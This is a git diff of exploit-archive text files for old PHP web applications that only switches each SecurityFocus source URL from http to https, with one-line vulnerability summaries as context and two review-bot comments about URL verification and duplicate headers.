@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15715/info +source: https://www.securityfocus.com/bid/15715/info eDating Professional is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26727.txt b/exploits/php/webapps/26727.txt index 83fc2725a..4ed12ea4e 100644 --- a/exploits/php/webapps/26727.txt +++ b/exploits/php/webapps/26727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15715/info +source: https://www.securityfocus.com/bid/15715/info eDating Professional is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26728.txt b/exploits/php/webapps/26728.txt index cde61597d..70c77672e 100644 --- a/exploits/php/webapps/26728.txt +++ b/exploits/php/webapps/26728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15716/info +source: https://www.securityfocus.com/bid/15716/info Portal Solutions is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26729.txt b/exploits/php/webapps/26729.txt index 87a27cea8..d77f03ae8 100644 --- a/exploits/php/webapps/26729.txt +++ b/exploits/php/webapps/26729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15717/info +source: https://www.securityfocus.com/bid/15717/info Affiliate Manager PRO is prone to an SQL injection vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26730.txt b/exploits/php/webapps/26730.txt index 9b63e1bfe..af93f0db5 100644 --- a/exploits/php/webapps/26730.txt 
+++ b/exploits/php/webapps/26730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15718/info +source: https://www.securityfocus.com/bid/15718/info Portal Solutions is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26731.txt b/exploits/php/webapps/26731.txt index 7509eaaa5..5d7af63e0 100644 --- a/exploits/php/webapps/26731.txt +++ b/exploits/php/webapps/26731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15719/info +source: https://www.securityfocus.com/bid/15719/info Blog System is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26732.txt b/exploits/php/webapps/26732.txt index 4a79fa0f6..2f33559fc 100644 --- a/exploits/php/webapps/26732.txt +++ b/exploits/php/webapps/26732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15720/info +source: https://www.securityfocus.com/bid/15720/info Trac is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26748.txt b/exploits/php/webapps/26748.txt index acd53de9b..2c32a7ebb 100644 --- a/exploits/php/webapps/26748.txt +++ b/exploits/php/webapps/26748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15742/info +source: https://www.securityfocus.com/bid/15742/info DoceboLMS is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26750.txt b/exploits/php/webapps/26750.txt index 553468bcf..694b38cf7 100644 --- a/exploits/php/webapps/26750.txt +++ b/exploits/php/webapps/26750.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15746/info +source: https://www.securityfocus.com/bid/15746/info PluggedOut Blog is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26751.txt b/exploits/php/webapps/26751.txt index 492c16dcd..f1374a2a1 100644 --- a/exploits/php/webapps/26751.txt +++ b/exploits/php/webapps/26751.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15747/info +source: https://www.securityfocus.com/bid/15747/info Cars Portal is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26755.txt b/exploits/php/webapps/26755.txt index 235fa5f3a..73b32ba6a 100644 --- a/exploits/php/webapps/26755.txt +++ b/exploits/php/webapps/26755.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15763/info +source: https://www.securityfocus.com/bid/15763/info ThWboard is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26756.txt b/exploits/php/webapps/26756.txt index 39be3523c..afb2bf766 100644 --- a/exploits/php/webapps/26756.txt +++ b/exploits/php/webapps/26756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15763/info +source: https://www.securityfocus.com/bid/15763/info ThWboard is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26757.txt b/exploits/php/webapps/26757.txt index 4b646e128..56305d114 100644 --- a/exploits/php/webapps/26757.txt +++ b/exploits/php/webapps/26757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15763/info +source: https://www.securityfocus.com/bid/15763/info ThWboard is prone to multiple input validation vulnerabilities. 
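Review bot: the `source:` line in 26755.txt, 26756.txt and 26757.txt is switched from http to https with no other edit, and nothing in these hunks records whether https://www.securityfocus.com/bid/15763/info was checked to resolve. If this is a mechanical scheme rewrite across the tree, say so in the commit message and state whether the new URLs were verified, so that a dead link is not read as a reviewed reference.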
diff --git a/exploits/php/webapps/26758.txt b/exploits/php/webapps/26758.txt index 4552aee62..7c4ab300b 100644 --- a/exploits/php/webapps/26758.txt +++ b/exploits/php/webapps/26758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15766/info +source: https://www.securityfocus.com/bid/15766/info DRZES HMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26770.txt b/exploits/php/webapps/26770.txt index 917cfdd76..39a216270 100644 --- a/exploits/php/webapps/26770.txt +++ b/exploits/php/webapps/26770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15792/info +source: https://www.securityfocus.com/bid/15792/info MilliScripts is prone to a cross-site scripting vulnerability. This is due to a lack of proper input validation. diff --git a/exploits/php/webapps/26780.txt b/exploits/php/webapps/26780.txt index cbc7bb2c5..e1765ff9d 100644 --- a/exploits/php/webapps/26780.txt +++ b/exploits/php/webapps/26780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15818/info +source: https://www.securityfocus.com/bid/15818/info Scout Portal Toolkit is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26781.txt b/exploits/php/webapps/26781.txt index 498aa725b..9d0ed252b 100644 --- a/exploits/php/webapps/26781.txt +++ b/exploits/php/webapps/26781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15818/info +source: https://www.securityfocus.com/bid/15818/info Scout Portal Toolkit is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26782.txt b/exploits/php/webapps/26782.txt index 47593db0b..69d7fe6b0 100644 --- a/exploits/php/webapps/26782.txt +++ b/exploits/php/webapps/26782.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15818/info +source: https://www.securityfocus.com/bid/15818/info Scout Portal Toolkit is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26783.txt b/exploits/php/webapps/26783.txt index b268ff949..c1e30c55a 100644 --- a/exploits/php/webapps/26783.txt +++ b/exploits/php/webapps/26783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15818/info +source: https://www.securityfocus.com/bid/15818/info Scout Portal Toolkit is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26784.txt b/exploits/php/webapps/26784.txt index 4c1067028..e09010cd8 100644 --- a/exploits/php/webapps/26784.txt +++ b/exploits/php/webapps/26784.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15819/info +source: https://www.securityfocus.com/bid/15819/info BTGrup Admin WebController is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26785.txt b/exploits/php/webapps/26785.txt index 442dcb7de..7c7096b29 100644 --- a/exploits/php/webapps/26785.txt +++ b/exploits/php/webapps/26785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15820/info +source: https://www.securityfocus.com/bid/15820/info Arab Portal is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26787.txt b/exploits/php/webapps/26787.txt index b35e56083..434157195 100644 --- a/exploits/php/webapps/26787.txt +++ b/exploits/php/webapps/26787.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15831/info +source: https://www.securityfocus.com/bid/15831/info PhpCOIN is prone to a file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26788.txt b/exploits/php/webapps/26788.txt index f7747f7aa..18c37098d 100644 --- a/exploits/php/webapps/26788.txt +++ b/exploits/php/webapps/26788.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15831/info +source: https://www.securityfocus.com/bid/15831/info PhpCOIN is prone to a file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26789.txt b/exploits/php/webapps/26789.txt index cb6457bf5..55a7bc0b5 100644 --- a/exploits/php/webapps/26789.txt +++ b/exploits/php/webapps/26789.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15836/info +source: https://www.securityfocus.com/bid/15836/info EncapsGallery is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26790.txt b/exploits/php/webapps/26790.txt index b7cb6c71f..ec9a405ae 100644 --- a/exploits/php/webapps/26790.txt +++ b/exploits/php/webapps/26790.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15837/info +source: https://www.securityfocus.com/bid/15837/info PhpWebGallery is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26791.txt b/exploits/php/webapps/26791.txt index b2e404af3..1b6510c0b 100644 --- a/exploits/php/webapps/26791.txt +++ b/exploits/php/webapps/26791.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15837/info +source: https://www.securityfocus.com/bid/15837/info PhpWebGallery is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26792.txt b/exploits/php/webapps/26792.txt index 991ccf2d4..40663e724 100644 --- a/exploits/php/webapps/26792.txt +++ b/exploits/php/webapps/26792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15837/info +source: https://www.securityfocus.com/bid/15837/info PhpWebGallery is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26793.txt b/exploits/php/webapps/26793.txt index 46c93224b..901862049 100644 --- a/exploits/php/webapps/26793.txt +++ b/exploits/php/webapps/26793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15839/info +source: https://www.securityfocus.com/bid/15839/info Plogger is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26794.txt b/exploits/php/webapps/26794.txt index 7d710bdd2..6224d57e2 100644 --- a/exploits/php/webapps/26794.txt +++ b/exploits/php/webapps/26794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15839/info +source: https://www.securityfocus.com/bid/15839/info Plogger is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26795.txt b/exploits/php/webapps/26795.txt index 08072b668..e4db51916 100644 --- a/exploits/php/webapps/26795.txt +++ b/exploits/php/webapps/26795.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15840/info +source: https://www.securityfocus.com/bid/15840/info VCD-db is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26796.txt b/exploits/php/webapps/26796.txt index 877da7662..00a744314 100644 --- a/exploits/php/webapps/26796.txt +++ b/exploits/php/webapps/26796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15840/info +source: https://www.securityfocus.com/bid/15840/info VCD-db is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26798.txt b/exploits/php/webapps/26798.txt index 07f8df624..66c9c8dc0 100644 --- a/exploits/php/webapps/26798.txt +++ b/exploits/php/webapps/26798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15842/info +source: https://www.securityfocus.com/bid/15842/info Mantis is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26799.txt b/exploits/php/webapps/26799.txt index fed238fc0..302b8a0fe 100644 --- a/exploits/php/webapps/26799.txt +++ b/exploits/php/webapps/26799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15844/info +source: https://www.securityfocus.com/bid/15844/info Snipe Gallery is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26800.txt b/exploits/php/webapps/26800.txt index abfcf2d36..756284f1c 100644 --- a/exploits/php/webapps/26800.txt +++ b/exploits/php/webapps/26800.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15844/info +source: https://www.securityfocus.com/bid/15844/info Snipe Gallery is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26801.txt b/exploits/php/webapps/26801.txt index 935400c34..cd6000666 100644 --- a/exploits/php/webapps/26801.txt +++ b/exploits/php/webapps/26801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15844/info +source: https://www.securityfocus.com/bid/15844/info Snipe Gallery is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26808.txt b/exploits/php/webapps/26808.txt index 1072eec9e..d35f7926e 100644 --- a/exploits/php/webapps/26808.txt +++ b/exploits/php/webapps/26808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15845/info +source: https://www.securityfocus.com/bid/15845/info mcGallery PRO is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26809.txt b/exploits/php/webapps/26809.txt index f99079572..67265faa0 100644 --- a/exploits/php/webapps/26809.txt +++ b/exploits/php/webapps/26809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15845/info +source: https://www.securityfocus.com/bid/15845/info mcGallery PRO is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26810.txt b/exploits/php/webapps/26810.txt index dec1eac56..10e0b877d 100644 --- a/exploits/php/webapps/26810.txt +++ b/exploits/php/webapps/26810.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15845/info +source: https://www.securityfocus.com/bid/15845/info mcGallery PRO is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26812.txt b/exploits/php/webapps/26812.txt index 1583e1e35..37a6af7d6 100644 --- a/exploits/php/webapps/26812.txt +++ b/exploits/php/webapps/26812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15847/info +source: https://www.securityfocus.com/bid/15847/info Ad Manager Pro is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26813.txt b/exploits/php/webapps/26813.txt index c8a4b6cc6..08697ad4e 100644 --- a/exploits/php/webapps/26813.txt +++ b/exploits/php/webapps/26813.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15848/info +source: https://www.securityfocus.com/bid/15848/info Job Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26814.txt b/exploits/php/webapps/26814.txt index 84807b6c0..d088e2dcb 100644 --- a/exploits/php/webapps/26814.txt +++ b/exploits/php/webapps/26814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15849/info +source: https://www.securityfocus.com/bid/15849/info Dream Poll is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26815.txt b/exploits/php/webapps/26815.txt index 5d7b0ef0e..b12ae690f 100644 --- a/exploits/php/webapps/26815.txt +++ b/exploits/php/webapps/26815.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15850/info +source: https://www.securityfocus.com/bid/15850/info ProjectForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26817.txt b/exploits/php/webapps/26817.txt index f18c234e3..de4689d5b 100644 --- a/exploits/php/webapps/26817.txt +++ b/exploits/php/webapps/26817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15855/info +source: https://www.securityfocus.com/bid/15855/info PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks. diff --git a/exploits/php/webapps/26818.txt b/exploits/php/webapps/26818.txt index aac6a6d40..fe7795dad 100644 --- a/exploits/php/webapps/26818.txt +++ b/exploits/php/webapps/26818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15857/info +source: https://www.securityfocus.com/bid/15857/info Envolution is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26819.txt b/exploits/php/webapps/26819.txt index 8bf9536ee..b736fbedf 100644 --- a/exploits/php/webapps/26819.txt +++ b/exploits/php/webapps/26819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15857/info +source: https://www.securityfocus.com/bid/15857/info Envolution is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26824.txt b/exploits/php/webapps/26824.txt index cef049b48..659a25a2a 100644 --- a/exploits/php/webapps/26824.txt +++ b/exploits/php/webapps/26824.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15860/info +source: https://www.securityfocus.com/bid/15860/info WikkaWiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26826.txt b/exploits/php/webapps/26826.txt index 74d3a7dcd..fa79e36be 100644 --- a/exploits/php/webapps/26826.txt +++ b/exploits/php/webapps/26826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15862/info +source: https://www.securityfocus.com/bid/15862/info Netref is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26827.txt b/exploits/php/webapps/26827.txt index 5c77df6c7..432674670 100644 --- a/exploits/php/webapps/26827.txt +++ b/exploits/php/webapps/26827.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26828.txt b/exploits/php/webapps/26828.txt index f648feecd..0c15c4829 100644 --- a/exploits/php/webapps/26828.txt +++ b/exploits/php/webapps/26828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26829.txt b/exploits/php/webapps/26829.txt index bee466625..d9381baf4 100644 --- a/exploits/php/webapps/26829.txt +++ b/exploits/php/webapps/26829.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26830.txt b/exploits/php/webapps/26830.txt index 5b3ccae2a..d1edd319d 100644 --- a/exploits/php/webapps/26830.txt +++ b/exploits/php/webapps/26830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26831.txt b/exploits/php/webapps/26831.txt index 4c9ec01d7..ad2cd669c 100644 --- a/exploits/php/webapps/26831.txt +++ b/exploits/php/webapps/26831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26832.txt b/exploits/php/webapps/26832.txt index 78f8a0775..761242a4b 100644 --- a/exploits/php/webapps/26832.txt +++ b/exploits/php/webapps/26832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15863/info +source: https://www.securityfocus.com/bid/15863/info QuickPayPro is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26836.txt b/exploits/php/webapps/26836.txt index 92f9fc196..4deb049ff 100644 --- a/exploits/php/webapps/26836.txt +++ b/exploits/php/webapps/26836.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15871/info +source: https://www.securityfocus.com/bid/15871/info Limbo CMS is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out cross-site scripting, SQL injection, and local file include attacks. diff --git a/exploits/php/webapps/26837.txt b/exploits/php/webapps/26837.txt index e58b479a7..5d5943abe 100644 --- a/exploits/php/webapps/26837.txt +++ b/exploits/php/webapps/26837.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15871/info +source: https://www.securityfocus.com/bid/15871/info Limbo CMS is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out cross-site scripting, SQL injection, and local file include attacks. diff --git a/exploits/php/webapps/26838.txt b/exploits/php/webapps/26838.txt index 1489a68f3..3bd76bbdf 100644 --- a/exploits/php/webapps/26838.txt +++ b/exploits/php/webapps/26838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15875/info +source: https://www.securityfocus.com/bid/15875/info E-commerce is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26839.txt b/exploits/php/webapps/26839.txt index 03094bbcc..c3c239ec2 100644 --- a/exploits/php/webapps/26839.txt +++ b/exploits/php/webapps/26839.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15876/info +source: https://www.securityfocus.com/bid/15876/info TML CMS is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26840.txt b/exploits/php/webapps/26840.txt index 6252c1a88..26cf6d6cb 100644 --- a/exploits/php/webapps/26840.txt +++ b/exploits/php/webapps/26840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15876/info +source: https://www.securityfocus.com/bid/15876/info TML CMS is prone to multiple input validation vulnerabilities. 
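Review bot: after this change 26839.txt and 26840.txt still open with the same `source:` URL (bid/15876) and, in the visible context, the same one-sentence description, so the header alone does not tell the two entries apart. Since line 1 is being touched anyway, consider adding a header line that names which of the TML CMS input validation issues each file covers.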
diff --git a/exploits/php/webapps/26841.txt b/exploits/php/webapps/26841.txt index 319d98140..71039266f 100644 --- a/exploits/php/webapps/26841.txt +++ b/exploits/php/webapps/26841.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15877/info +source: https://www.securityfocus.com/bid/15877/info E-commerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26844.txt b/exploits/php/webapps/26844.txt index c6335e05b..a91971ff9 100644 --- a/exploits/php/webapps/26844.txt +++ b/exploits/php/webapps/26844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15885/info +source: https://www.securityfocus.com/bid/15885/info DCForum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26853.txt b/exploits/php/webapps/26853.txt index 31117cf23..01bd32fc6 100644 --- a/exploits/php/webapps/26853.txt +++ b/exploits/php/webapps/26853.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15908/info +source: https://www.securityfocus.com/bid/15908/info ezDatabase is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26854.txt b/exploits/php/webapps/26854.txt index 9eb970fe8..593b6fbc2 100644 --- a/exploits/php/webapps/26854.txt +++ b/exploits/php/webapps/26854.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15908/info +source: https://www.securityfocus.com/bid/15908/info ezDatabase is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26855.txt b/exploits/php/webapps/26855.txt index f9b045cb7..1c04eaaf7 100644 
--- a/exploits/php/webapps/26855.txt +++ b/exploits/php/webapps/26855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15910/info +source: https://www.securityfocus.com/bid/15910/info iHTML Merchant Mall is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26856.txt b/exploits/php/webapps/26856.txt index a36a63f69..b801f95d1 100644 --- a/exploits/php/webapps/26856.txt +++ b/exploits/php/webapps/26856.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15911/info +source: https://www.securityfocus.com/bid/15911/info iHTML Merchant is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26857.txt b/exploits/php/webapps/26857.txt index d5cc6630a..44672482c 100644 --- a/exploits/php/webapps/26857.txt +++ b/exploits/php/webapps/26857.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15912/info +source: https://www.securityfocus.com/bid/15912/info PAFileDB Extreme Edition is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26866.txt b/exploits/php/webapps/26866.txt index 9ec279d8a..68c6e5928 100644 --- a/exploits/php/webapps/26866.txt +++ b/exploits/php/webapps/26866.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15920/info +source: https://www.securityfocus.com/bid/15920/info Round Cube will reportedly reveal its installation path in an error message output to the client. The filesystem layout can be sensitive information that is useful in other attacks against the target server. The trigger for this behavior is not clear; it may occur whenever a script fails and may be dependent on web-server or script configuration settings. diff --git a/exploits/php/webapps/26867.txt b/exploits/php/webapps/26867.txt index 7fa442f0e..b6f3c1f35 100644 --- a/exploits/php/webapps/26867.txt +++ b/exploits/php/webapps/26867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15924/info +source: https://www.securityfocus.com/bid/15924/info PHP Fusebox is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26868.txt b/exploits/php/webapps/26868.txt index 5e15ba707..9c5f8dc39 100644 --- a/exploits/php/webapps/26868.txt +++ b/exploits/php/webapps/26868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15925/info +source: https://www.securityfocus.com/bid/15925/info JPortal Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26870.txt b/exploits/php/webapps/26870.txt index 5d97a1f25..f23c84cdb 100644 --- a/exploits/php/webapps/26870.txt +++ b/exploits/php/webapps/26870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15927/info +source: https://www.securityfocus.com/bid/15927/info Advanced Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26871.txt b/exploits/php/webapps/26871.txt index b9a5c9688..b0b36854d 100644 
